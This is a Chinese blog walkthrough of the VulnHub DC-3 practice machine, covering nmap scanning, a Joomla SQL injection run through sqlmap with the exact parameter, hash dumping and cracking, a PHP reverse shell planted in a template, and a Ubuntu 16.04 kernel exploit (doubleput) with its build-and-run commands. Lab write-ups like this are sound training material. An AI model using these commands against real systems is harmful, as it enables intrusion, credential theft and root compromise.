vulnhub-dc-3


vulnhub第四个靶机

靶机地址: https://www.vulnhub.com/entry/dc-32,312/.

知识点

nmap

用nmap查询局域网内存活的主机,发现靶机ip

nmap 192.168.88.0/24 -T4

在这里插入图片描述
用nmap进行更详细的探测,发现开着的端口和服务

端口服务
80http
nmap 192.168.88.139 -T4 -A -sV -p-

nmap扫出了是joomlaCMS,在github上有专门的扫描工具 joomscan.

在这里插入图片描述

joomlaCMS的sql注入

端口:80——>web漏洞——>成功

用joomscan对其进行扫描,发现网站管理后台和joomla版本

./joomscan.pl --url 192.168.88.139 

在这里插入图片描述
在kali中寻找该版本漏洞信息,发现两条关于注入的利用方法,我这里使用的是42033.txt里面的方法

在这里插入图片描述
注入成功

sqlmap -u "http://192.168.88.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbs

在这里插入图片描述
成功爆出用户名和hash密码,再配合john爆破hash,成功获取明文密码。

sqlmap -u "http://192.168.88.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D 'joomladb' -T '#__users' -C 'name','password'  --dump

在这里插入图片描述

john --wordlist=rockyou.txt dc3.txt

admin:snoopy

在这里插入图片描述

反弹shell

如下图所示编写nc的php反弹shell,在kali设置监听,然后访问木马,即可收到反弹shell


需要注意的是这个一句话的路径是:http://192.168.88.139/templates/beez3/index.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

内核提权ubuntu 16.04

python -c "import pty;pty.spawn('/bin/bash')"

接下来就是提权部分,但是查看了一下,没有可执行sudo命令的用户,没有suid权限的可执行命令或者文件,没有定时任务,没有权限滥用危险文件。万不得已只能试一下内核提权了。

在这里插入图片描述

searchsploit ubuntu 16.04 
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
wget 
unzip 39772.zip  #解压29772.zip文件
cd 39772
tar -xvf exploit.tar  #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit
./compile.sh 
./doubleput
id

在这里插入图片描述

ps:

个人站点博客:XingHe,欢迎来踩~

参考链接: https://blog.csdn.net/weixin_44426869/article/details/104779201?fps=1&locationNum=2.

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值